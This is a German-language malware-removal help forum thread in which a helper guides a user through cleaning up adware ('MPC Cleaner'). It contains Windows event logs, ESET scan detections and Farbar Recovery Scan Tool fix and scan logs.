Error: (03/30/2016 01:55:00 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Systemfehler:
=============
Error: (03/30/2016 01:43:18 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 01:43:16 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 01:43:16 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 08:19:16 AM) (Source: BTHUSB) (EventID: 17) (User: )
Description: Der lokale Bluetooth-Adapter ist aus einem unbekannten Grund fehlgeschlagen und wird nicht verwendet. Der Treiber wurde entladen.
Error: (03/29/2016 06:40:53 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet:
%%1062
Error: (03/29/2016 06:40:35 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler:
%%1056
Error: (03/29/2016 06:40:06 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "DeleteFlag" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
CodeIntegrity:
===================================
Date: 2016-01-27 20:34:50.024
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:33:27.259
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:32.120
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:31.842
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.532
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.366
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:19.557
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:13.438
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.166
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz
Prozentuale Nutzung des RAM: 34%
Installierter physikalischer RAM: 3971.27 MB
Verfügbarer physikalischer RAM: 2611.04 MB
Summe virtueller Speicher: 8067.27 MB
Verfügbarer virtueller Speicher: 5926.15 MB
==================== Laufwerke ================================
Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:392.05 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D)
Partition: GPT.
==================== Ende von Addition.txt ============================
|
|
30.03.2016, 14:04
| #9 |
| /// Malwareteam | MPC Cleaner lässt sich nicht löschen (Maleware) Nein das ist ein Chrome spezifisches Problem, also nur mit Chrome machen
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
|
30.03.2016, 15:55
| #10 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) Hallo Rafael, ok, den Chrom habe ich bei meinen "Aufräumversuchen" kaum beachtet, da ich den nie nutze. Dann warte ich jetzt noch dein Urteil ab und hoffe, dass es erledigt ist - zumindest habe ich bis jetzt den Eindruck, dass die Probleme nicht mehr auftreten. Falls du noch einen Tip hast, welches Programm ich zukünftig nutzen könnte, um das Problem zu vermeiden, wäre ich dir sehr dankbar. |
|
30.03.2016, 22:17
| #11 |
| /// Malwareteam | MPC Cleaner lässt sich nicht löschen (Maleware) Also wie gesagt, dein Chrome bzw. die Reste davon sind im Eimer. Es kann sein, dass du Chrome garnicht zur Auswahl hast zum deinstallieren, in diesem Fall installiere dir Chrome drüber und fahre dann oben mit der vollständigen Deinstallation fort Wir sind fast fertig: ESET Online Scanner
Hinweis: Dieser Scan kann schon einmal mehrere Stunden dauern...
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
|
31.03.2016, 01:53
| #12 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) Chrome ist deinstalliert und ESET nach Anleitung auch. Hier die Ergebnisse von ESET: Code:
ATTFilter ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=5efff497f84dc54380e17e1ad7778ee9
# end=init
# utc_time=2016-03-30 09:52:56
# local_time=2016-03-30 11:52:56 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28827
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=5efff497f84dc54380e17e1ad7778ee9
# end=updated
# utc_time=2016-03-30 09:59:16
# local_time=2016-03-30 11:59:16 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=5efff497f84dc54380e17e1ad7778ee9
# engine=28827
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-03-31 12:44:52
# local_time=2016-03-31 02:44:52 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT
# compatibility_mode_1='Avira Antivirus'
# compatibility_mode=1815 16777213 100 100 10468 32794980 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 5726438 23174662 0 0
# scanned=407792
# found=16
# cleaned=0
# scan_time=9936
sh=591176C07CA0FB5EF209BD67D8CCCD2CAF18390C ft=1 fh=266304c574081d8f vn="Variante von Win32/ELEX.HI evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\bugreport.exe.vir"
sh=767505D6B728170EFF73BC34BED8D234397602F3 ft=1 fh=a76b10b008294658 vn="Variante von Win32/ELEX.HI evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ccuter.exe.vir"
sh=D8CB5CDA4304EDEA8B87300762C7B545A56A6969 ft=1 fh=9069b0f7bfa29111 vn="Variante von Win32/ELEX.HI evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ffuter.exe.vir"
sh=BFA5BA61ACE80984FE53B88C10F8ECB1B32883A4 ft=1 fh=2d3f97d88a4a71b9 vn="Variante von Win32/ELEX.HH evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\Winsere.exe.vir"
sh=BFA5BA61ACE80984FE53B88C10F8ECB1B32883A4 ft=1 fh=2d3f97d88a4a71b9 vn="Variante von Win32/ELEX.HH evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\Winsere\Winsere\Winsere.exe.vir"
sh=B7E2FB810C0D71AF84782A0B64600A68E46C7776 ft=1 fh=7b64b17d945551a5 vn="Variante von Win32/ELEX.HH evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe.vir"
sh=E0BA599048B8C2B518CF3D262C13FD4B69BEB832 ft=0 fh=0000000000000000 vn="Win32/AztecMedia.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Denny\AppData\Local\Chromium\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\newtab.html.vir"
sh=618159FBD13DC5C93638F7903755BB2211302704 ft=1 fh=8340d79ae02c1341 vn="Variante von Win32/Goobzo.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Denny\AppData\Local\DeskBar\dblaunch.exe.vir"
sh=66EC0DA71D8BF807D474ADC9D71BD32EA4EDC955 ft=1 fh=0655fb80a68ddc6c vn="Variante von MSIL/Goobzo.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Denny\AppData\Local\DeskBar\3.1.0.1866\DeskBar.exe.vir"
sh=C81214BEF922A09B347F10ECAD857635E78B175A ft=1 fh=70f34604069d89e9 vn="Variante von Win64/Packed.Komodia.A verdächtige Datei" ac=I fn="C:\AdwCleaner\FileQuarantine\C\WINDOWS\SysNative\LavasoftTcpService64.dll.vir"
sh=0AA495433A70EB588E5157F44909D284DB405766 ft=1 fh=fc7510d09bb476bc vn="Variante von Win32/Packed.Komodia.A verdächtige Datei" ac=I fn="C:\AdwCleaner\FileQuarantine\C\WINDOWS\SysWOW64\lavasofttcpservice.dll.vir"
sh=4AE3131FD38BF2C958731E6593FBD3EF0A70B75F ft=0 fh=0000000000000000 vn="Mehrere Bedrohungen" ac=I fn="C:\temp\InstallFilter64.msi"
sh=E9C749B477FA6532635B76A153BEAD42D71B4445 ft=1 fh=fd8655f004102309 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe"
sh=4FA8EDA7528058B7653D10056AB06C64C3A7E2C8 ft=1 fh=1a3598f4991d26e2 vn="MSIL/Hoax.FakeHack.FA Anwendung" ac=I fn="C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe"
sh=4FA8EDA7528058B7653D10056AB06C64C3A7E2C8 ft=1 fh=1a3598f4991d26e2 vn="MSIL/Hoax.FakeHack.FA Anwendung" ac=I fn="C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe"
sh=8D1D10262B79E8EBD3CBFD1904BB5F0E7DCF9723 ft=1 fh=a7059d22de5954b2 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe"
|
|
31.03.2016, 11:17
| #13 |
| /// Malwareteam | MPC Cleaner lässt sich nicht löschen (Maleware) Schritt: 1 Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter
C:\temp\InstallFilter64.msi
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe
emptytemp:
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Schritt: 2 Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen. Wenn das passt, sind wir so gut wie fertig
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
|
31.03.2016, 11:57
| #14 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) Hallo Rafael, ich hoffe doch, dass es bald erledigt ist - ich bekomme ja so langsam ein schhlechtes Gewissen, dass ich so viel deiner Zeit in Anspruch nehme. Hier die Ergebnisse: Fixlog: Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-31 12:29:11) Run:2
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny & (Verfügbare Profile: Denny & Administrator)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
C:\temp\InstallFilter64.msi
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe
emptytemp:
*****************
C:\temp\InstallFilter64.msi => erfolgreich verschoben
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe => erfolgreich verschoben
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe => erfolgreich verschoben
EmptyTemp: => 35.9 MB temporäre Dateien entfernt.
Das System musste neu gestartet werden.
==== Ende von Fixlog 12:29:18 ====
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01 durchgeführt von Denny (Administrator) auf SCHNEIDER (31-03-2016 12:39:25) Gestartet von C:\Users\Denny\Desktop Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator) Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser nicht gefunden!) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe (SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe (SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel Corporation) C:\Windows\System32\igfxTray.exe (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe (Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor) HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG) HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated) HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG) HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications) HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 FF NewTab: about:newtab FF Homepage: about:home FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems) FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert] Chrome: ======= CHR dev: Chrome dev build erkannt! <======= ACHTUNG StartMenuInternet: Google Chrome - chrome.exe ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated) S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert] R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated) S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated) R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION) R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation) R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation) R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate) R2 MBAMScheduler; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avipbb; 